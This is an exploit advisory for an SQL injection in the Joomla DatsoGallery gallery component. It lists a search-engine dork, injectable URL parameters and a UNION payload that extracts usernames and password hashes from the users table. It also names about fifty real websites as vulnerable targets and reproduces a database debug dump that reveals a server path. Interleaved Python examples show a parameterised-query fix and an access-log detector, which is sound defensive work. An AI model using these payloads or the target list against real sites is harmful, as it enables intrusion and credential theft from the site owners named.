- ####################################################################
- # Exploit Title : Joomla DatsoGallery Components 3.4.4 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : datso.fr
- # Software Download Link : datso.fr/products.html
- # Software Information Link : extensions.joomla.org/extension/datsogallery/
- # Software Affected Versions : 3.4.4 and previous versions
- 1.3.6.1 - 1.3.8 ~ 1.5 ~ 1.14 ~ 1.6 ~ 1.6.2 - 1.7.1 - 1.20 - 1.8.8 - 1.8.4 - 1.8.9 - 1.9.5
- # Software Prices : 20$ - 60$ - 120$ - 240$
- # Software Technical Requirements :
- DatsoGallery Multilingual is a native Joomla! and Mambo 4.6.x gallery component
- DatsoGallery Multilingual is a native Joomla! and Mambo [ No Version ] gallery component
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:''/index.php?option=com_datsogallery''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Old Similar CVE => CVE-2008-1540 => nvd.nist.gov/vuln/detail/CVE-2008-1540
- # Old Similar CVE => CVE-2008-5208 => cvedetails.com/cve/CVE-2008-5208/
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The DatsoGallery component helps you quickly and effortlessly create a multi-functional
- photo gallery. The intuitive interface makes it easy to manage the component and its content.
- Its many settings let you organize the gallery to suit your requirements.
- It is a powerful image gallery component that helps you quickly and effortlessly
- create a beautiful, multi-functional photo gallery on your web site.
- ####################################################################
- # Impact :
- ***********
- The DatsoGallery component for Joomla, version 3.4.4 and other versions,
- is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
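The root cause named above (a request value used in an SQL query without sanitization) and its fix are shown below as an added example; this is not the component's PHP code and not part of the original advisory. It is a Python/sqlite3 illustration that uses only the two table names visible in the debug output later on the page (jos_datsogallery, jos_datsogallery_catg); the columns, rows and function names are constructed for this example. The unsafe builder has the same shape as query 6 in that debug output, where the id from the request is pasted into the SQL text; the safe builder enforces the [ID-NUMBER] contract first and then binds the value as a parameter.

```python
import sqlite3
from typing import Callable, List, Tuple

# Constructed in-memory schema for this example. Only the table names come from the
# advisory's debug output; the columns and rows are invented for illustration.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE jos_datsogallery_catg (cid INTEGER PRIMARY KEY, name TEXT, access INTEGER);
        CREATE TABLE jos_datsogallery (id INTEGER PRIMARY KEY, catid INTEGER, imgtitle TEXT);
        INSERT INTO jos_datsogallery_catg VALUES (141, 'Public album', 0), (3, 'Members only', 1);
        INSERT INTO jos_datsogallery VALUES (2219, 141, 'Public photo'), (2220, 3, 'Private photo');
    """)
    return conn

Row = Tuple
Lookup = Callable[[sqlite3.Connection, str], List[Row]]

def lookup_image_unsafe(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    # Same shape as query 6 in the debug output: the request value is pasted into the
    # SQL text, so anything it contains becomes part of the statement.
    sql = ("select a.*, cc.name as category from jos_datsogallery as a, jos_datsogallery_catg as cc "
           "where a.catid=cc.cid and a.id=" + raw_id + " and cc.access<=0")
    return conn.execute(sql).fetchall()

def lookup_image_safe(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    # 1. Enforce the documented contract ([ID-NUMBER]) before touching the database.
    if not raw_id.isdigit():
        raise ValueError(f"rejected non-numeric id: {raw_id!r}")
    # 2. Bind the value as a parameter; it can no longer alter the statement's structure.
    sql = ("select a.*, cc.name as category from jos_datsogallery as a, jos_datsogallery_catg as cc "
           "where a.catid=cc.cid and a.id=? and cc.access<=?")
    return conn.execute(sql, (int(raw_id), 0)).fetchall()

def outcome(lookup: Lookup, conn: sqlite3.Connection, raw_id: str) -> str:
    """Run one lookup and summarise what happened, so the two builders can be compared."""
    try:
        rows = lookup(conn, raw_id)
    except ValueError:
        return "rejected-before-query"
    except sqlite3.OperationalError:
        return "sql-syntax-error"
    return f"{len(rows)} row(s)"

if __name__ == "__main__":
    db = make_db()
    for value in ("2219", "2219'", "0 or 1=1"):
        print(f"{value!r:12} unsafe={outcome(lookup_image_unsafe, db, value):24} "
              f"safe={outcome(lookup_image_safe, db, value)}")
```

With a plain id both builders return the same single row. With a trailing quote the unsafe builder hands a malformed statement to the database (the error class that produces the debug dump shown later on this page), and with a tautology it also returns the "Private photo" row even though the access check was meant to exclude it; the safe builder rejects both inputs before any SQL runs.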
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_datsogallery&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&func=detail&id=[SQL Injection]
- /index.php?option=com_datsogallery&func=wmark&oid=[SQL Injection]
- /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection]
- /index.php?option=com_datsogallery&task=image&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&func=detail&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&task=sbox&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw
- /index.php?option=com_datsogallery&func=slideshow&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw
- /index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection]
- /index.php?option=com_datsogallery&func=download&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&task=downloads&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&func=lastadded&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection]
- /index.php?option=com_datsogallery&Itemid=[SQL Injection]&func=special&sorting=lastcomment
- /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&catid=[ID-NUMBER]&id=[SQL Injection]&lang=hu
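The parameter list above doubles as a detection signature: every injectable parameter is one the component expects to be an integer, so a web-server access log can be checked for com_datsogallery requests where one of those values is not a plain number. The script below is an added example (not part of the advisory) that does exactly that over constructed common-log-format lines; the parameter names come from the list above, the log lines and addresses are invented for the example, and the indicator labels are this example's own vocabulary. Repeated keys such as Itemid=&Itemid=... are checked individually.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Request parameters the advisory lists as injectable; the component treats all of them as integers.
NUMERIC_PARAMS = ("Itemid", "id", "catid", "oid", "limitstart", "startpage")

# Common log format request line: client, timestamp, "METHOD target PROTOCOL", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_value(value: str) -> Optional[str]:
    """Label a parameter value that breaks the integer contract, or return None if it is clean."""
    v = unquote(value).strip()          # a second decode catches %2527-style double encoding
    if v == "" or re.fullmatch(r"-?\d+", v):
        return None
    low = v.lower()
    if re.search(r"\bunion\b|\bselect\b|concat_ws", low):
        return "union/select"
    if "'" in v or '"' in v:
        return "quote"
    if "/*" in v or "--" in v or "#" in v:
        return "comment"
    return "non-numeric"

def scan(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious com_datsogallery parameter value in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if qs.get("option") != ["com_datsogallery"]:
            continue                      # only the vulnerable component is in scope
        for param in NUMERIC_PARAMS:
            for value in qs.get(param, []):   # repeated keys (Itemid=&Itemid=...) are all checked
                label = classify_value(value)
                if label:
                    findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "param": param,
                                     "value": value, "indicator": label, "status": m.group("status")})
    return findings

# Constructed sample log lines (RFC 5737 addresses); the request shapes follow the advisory's URL list.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Feb/2019:10:01:02 +0000] "GET /index.php?option=com_datsogallery&Itemid=40&func=detail&catid=2&id=47 HTTP/1.1" 200 5120
203.0.113.10 - - [14/Feb/2019:10:01:09 +0000] "GET /index.php?option=com_datsogallery&Itemid=40&func=detail&catid=2&id=47%27 HTTP/1.1" 500 812
203.0.113.10 - - [14/Feb/2019:10:01:15 +0000] "GET /index.php?option=com_datsogallery&func=detail&id=2219'union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/* HTTP/1.1" 200 6110
198.51.100.7 - - [14/Feb/2019:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=12%27 HTTP/1.1" 200 3002
203.0.113.10 - - [14/Feb/2019:10:02:30 +0000] "GET /index.php?option=com_datsogallery&func=lastadded&Itemid=93&limitstart=12 HTTP/1.1" 200 4100
203.0.113.10 - - [14/Feb/2019:10:03:05 +0000] "GET /index.php?option=com_datsogallery&func=detail&catid=88&id=454&Itemid=&Itemid=41%27 HTTP/1.1" 500 812
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']}  {f['param']}={f['value']!r}  [{f['indicator']}]  HTTP {f['status']}")
```

Restricting the rule to option=com_datsogallery and to the integer parameters keeps the false-positive rate low (the com_content request with a quoted id is deliberately ignored); the HTTP status is carried along because a 500 on a quoted id, as in the second and last lines, is the same symptom the advisory's debug dump records.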
- # Information Disclosure Exploit :
- *****************************
- /administrator/components/com_datsogallery/datsogallery.xml
- # Example SQL Injection Payload :
- *******************************
- 'union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] fcassan.fr/index.php?option=com_datsogallery&Itemid=0&func=detail&id=2219%27
- [+] prapodnichkennel.hu/index.php?option=com_datsogallery&Itemid=40&func=detail&catid=2&id=47%27
- [+] abusheikha.com/ds/index.php?option=com_datsogallery&task=image&catid=1&id=4&Itemid=150%27
- [+] aziendaagricolagiuliana.it/index.php?option=com_datsogallery&func=slideshow&catid=7&id=136&format=raw
- [+] elmigraphic.ir/index.php?option=com_datsogallery&task=sbox&catid=9&id=42&format=raw
- [+] istitutoplateja.it/sct/index.php?option=com_datsogallery&Itemid=55&func=viewcategory&catid=8%27
- [+] levissi.com/levissi/index.php?option=com_datsogallery&Itemid=27&func=detail&id=63%27
- [+] en.kamieniarstwo.rzeszow.pl/index.php?option=com_datsogallery&Itemid=42&func=detail&id=196%27
- [+] otelparpali.com/index.php?option=com_datsogallery&Itemid=0&func=detail&catid=2&id=31%27
- [+] dunyaengelliler.org.tr/index.php?option=com_datsogallery&func=detail&catid=2&id=64&Itemid=6%27
- [+] rehberturk.de/index.php?option=com_datsogallery&Itemid=33&func=viewcategory&catid=7%27
- [+] grupobetel.com.co/granos.grupobetel.com.co/index.php?option=com_datsogallery&func=slideshow&catid=1&id=12&format=raw
- [+] akmedder.org.tr/index.php?option=com_datsogallery&view=image&catid=5&id=60&Itemid=164%27
- [+] ecet-egy.com/index.php?option=com_datsogallery&Itemid=0&func=detail&catid=6&id=100%27
- [+] comunebreme.it/index.php?option=com_datsogallery&func=viewcategory&catid=2&Itemid=208%27
- [+] novapekaren.sk/index.php?option=com_datsogallery&Itemid=57&func=detail&id=2258%27
- [+] kopaonik-komita.com/index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=1%27
- [+] mmgalway.com/index.php?option=com_datsogallery&Itemid=7&func=viewcategory&catid=1%27
- [+] xn--b1apfhdpdb.xn--p1ai/index.php?option=com_datsogallery&Itemid=42%27
- [+] agrodam.cz/hokej/index.php?option=com_datsogallery&func=download&id=291&Itemid=28%27
- [+] zusnovadubnica.sk/index.php/index.php?option=com_datsogallery&func=wmark&oid=77%27
- [+] lapiazzetta.org/index.php?option=com_datsogallery&Itemid=60&func=detail&catid=10&id=540%27
- [+] gynpaucin.sk/index.php?option=com_datsogallery&task=sbox&catid=4&id=442&format=raw
- [+] sadra-co.com/en/index.php?option=com_datsogallery&Itemid=75%27
- [+] solidaritemadagascar.fr/index.php?option=com_datsogallery&Itemid=123&func=detail&id=79%27
- [+] lift.ru/index.php?option=com_datsogallery&Itemid=44&func=detail&catid=7&id=46%27
- [+] roska-teplice.cz/index.php?option=com_datsogallery&Itemid=15&func=detail&catid=11&id=63%27
- [+] cclv38.free.fr/home/index.php?option=com_datsogallery&Itemid=48&func=detail&id=123%27
- [+] ulrg.ru/index.php?option=com_datsogallery&Itemid=116&func=detail&catid=4&id=969%27
- [+] muvfex.jo/index.php?option=com_datsogallery&func=lastadded&Itemid=93&limitstart=12%27
- [+] cms.elosoavila.org/index.php?option=com_datsogallery&Itemid=30&func=detail&catid=3&id=16%27
- [+] uk-plitka-ru.1gb.ru/index.php?option=com_datsogallery&func=detail&catid=88&id=454&Itemid=&Itemid=41%27
- [+] shkolatmz7.ru/index.php?option=com_datsogallery&Itemid=0&func=detail&catid=38&id=394%27
- [+] k-s-i.org/index.php?option=com_datsogallery&Itemid=194&func=detail&catid=1&id=2%27
- [+] en.kamieniarstwo.rzeszow.pl/index.php?option=com_datsogallery&Itemid=42&func=viewcategory&catid=7%27
- [+] tkd.ee/old/index.php?option=com_datsogallery&Itemid=72&func=viewcategory&catid=145&startpage=10%27
- [+] levissi.com/levissi/index.php?option=com_datsogallery&Itemid=27&func=detail&id=72%27
- [+] kevserisi.com.tr/index.php?option=com_datsogallery&func=viewcategory&catid=12&Itemid=139%27
- [+] remarose.etouchsite.com/index.php?option=com_datsogallery&task=sbox&catid=8&id=149&format=raw
- [+] gaspargabor.festomester.hu/ggjoomla/index.php?option=com_datsogallery&Itemid=30&func=special&sorting=lastcomment
- [+] joomla.demo.c4.cz/index.php?option=com_datsogallery&Itemid=10%27
- [+] bonusclub.cz/index.php?option=com_datsogallery&Itemid=0&func=detail&catid=1&id=4%27
- [+] gss.hu/index.php?option=com_datsogallery&Itemid=39&func=viewcategory&catid=2&Itemid=42%27
- [+] cuvelier-roy.com/index.php%3Foption=com_datsogallery&Itemid=38&func=viewcategory&catid=2.html
- [+] blhovce.sk/old/index.php?option=com_datsogallery&Itemid=9&func=detail&catid=9&id=158&lang=hu
- [+] roska-teplice.cz/index.php?option=com_datsogallery&Itemid=1&func=detail&catid=6&id=39%27
- ####################################################################
- # Example SQL Database Errors :
- ****************************
- 30 queries executed
- 1
- SET sql_mode = 'MYSQL40'
- 2
- SELECT folder, element, published, params
- FROM jos_mambots
- WHERE published >= 1
- AND access <= 0
- AND folder = 'system'
- ORDER BY ordering
- 3
- SELECT template
- FROM jos_templates_menu
- WHERE client_id = 0
- AND ( menuid = 0 OR menuid = 99999999 )
- ORDER BY menuid DESC
- LIMIT 1
- 4
- DELETE FROM jos_session
- WHERE (
- ( time < '1550015982' )
- AND guest = 0
- AND gid > 0
- ) OR (
- ( time < '1550015982' )
- AND guest = 1
- AND userid = 0
- )
- 5
- SELECT *
- FROM jos_menu
- WHERE published = 1 AND
- link LIKE 'index.php?option=com\_datsogallery%'
- 6
- select a.*, cc.name as category from jos_datsogallery as a, jos_datsogallery_catg as cc
- where a.catid=cc.cid and a.id=2219 and cc.access<='0'
- 7
- select * from jos_datsogallery_catg where cid=141 and published=1 and access<='0'
- 8
- select * from jos_datsogallery_catg where cid=3 and published=1 and access<='0'
- 9
- select c.access from jos_datsogallery_catg as c left join jos_datsogallery as a on a.catid=c.cid where a.id= '2219'
- 10
- select a.id, a.catid, a.imgtitle, a.imgauthor, a.imgtext, a.imgdate, a.imgcounter, a.imgvotes, a.imgvotesum, a.published,
- a.imgoriginalname, a.imgfilename, a.imgthumbname, a.owner, u.id FROM jos_datsogallery as a left join jos_users
- as u on u.username=a.owner where a.id='2219' and a.approved=1
- 11
- select a.id, a.catid, a.imgtitle, a.imgauthor, a.imgtext, a.imgdate, a.imgcounter, a.imgvotes, a.imgvotesum,
- a.published, a.imgoriginalname, a.imgfilename, a.imgthumbname, a.owner, u.id FROM jos_datsogallery as a
- left join jos_users as u on u.username=a.owner where a.id='2219' and a.approved=1
- 12
- SELECT id, imgfilename FROM jos_datsogallery WHERE catid=141 ORDER BY id DESC
- 13
- UPDATE jos_datsogallery SET imgcounter='286' WHERE id=2219
- 14
- SELECT a.*
- FROM jos_components AS a
- WHERE ( a.admin_menu_link = 'option=com_syndicate' OR a.admin_menu_link =
- 'option=com_syndicate&hidemainmenu=1' )
- AND a.option = 'com_syndicate'
- 15
- SELECT id, title, module, position, content, showtitle, params
- FROM jos_modules AS m
- INNER JOIN jos_modules_menu AS mm ON mm.moduleid = m.id
- WHERE m.published = 1
- AND m.access <= 0
- AND m.client_id != 1
- AND ( mm.menuid = 0 )
- ORDER BY ordering
- 16
- SELECT m.*
- FROM jos_menu AS m
- WHERE menutype = 'topmenu'
- AND published = 1
- AND access <= 0
- AND parent = 0
- ORDER BY ordering
- 17
- SELECT m.*
- FROM jos_menu AS m
- WHERE menutype = 'mainmenu'
- AND published = 1
- AND access <= 0
- ORDER BY parent, ordering
- 18
- SELECT COUNT( id )
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- 19
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=1'
- 20
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=13'
- 21
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=12'
- 22
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=14'
- 23
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=15'
- 24
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=16'
- 25
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=17'
- 26
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=18'
- 27
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=23'
- 28
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=38'
- 29
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=46'
- 30
- SELECT id, name, link, parent, type, menutype, access
- FROM jos_menu
- WHERE published = 1
- AND access <= 0
- ORDER BY menutype, parent, ordering
- Strict Standards: Non-static method JSite::getMenu() should not be called
- statically in /home/abusheik/public_html/ds/components
- /com_datsogallery/datsogallery.php on line 20
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################